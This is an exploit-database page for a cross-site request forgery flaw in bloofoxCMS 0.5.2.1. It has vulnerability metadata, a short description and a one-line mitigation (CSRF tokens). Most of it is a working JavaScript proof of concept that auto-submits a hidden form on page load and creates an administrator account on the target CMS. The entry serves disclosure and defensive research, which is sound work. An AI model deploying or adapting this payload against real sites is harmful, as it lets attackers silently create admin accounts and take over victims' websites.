header-logo
Suggest Exploit
vendor:
bloofoxCMS
by:
LiPeiYi
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: bloofoxCMS
Affected Version From: 0.5.1.0
Affected Version To: 0.5.2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:bloofox:bloofoxcms:0.5.2.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2020

bloofoxCMS 0.5.2.1 – CSRF (Add user)

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Mitigation:

Implementing a CSRF token in the application can help mitigate this vulnerability.
Source

Exploit-DB raw data:

# Title: bloofoxCMS 0.5.2.1 - CSRF (Add user)
# Exploit Author: LiPeiYi
# Date: 2020-12-18
# Vendor Homepage: https://www.bloofox.com/
# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1
# Version: 0.5.1.0 -.5.2.1
# Tested on: windows 10

#Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site

###PoC
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='username' value='testuser01' />";
fields += " <input type='hidden' name='password' value='testpw123' />";  
fields += " <input type='hidden' name='pwdconfirm' value='testpw123' />";  
fields += "<input type='hidden' name='3' value='Admin' />";  
fields += " <input type='hidden' name='blocked' value='0' />";  
fields += "<input type='hidden' name='deleted' value='0' />";  
fields += "<input type='hidden' name='status' value='1' />";  
fields += "<input type='hidden' name='login_page' value='0' />";  
fields += "<input type='hidden' name='send' value='Add+User' />";  


var url = "http://test.com/admin/index.php?mode=user&action=new&submit=send";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>

</body>
</html>


exp detail:https://github.com/alexlang24/bloofoxCMS/issues/4

Navigation

Suggest Exploit

Services By CQR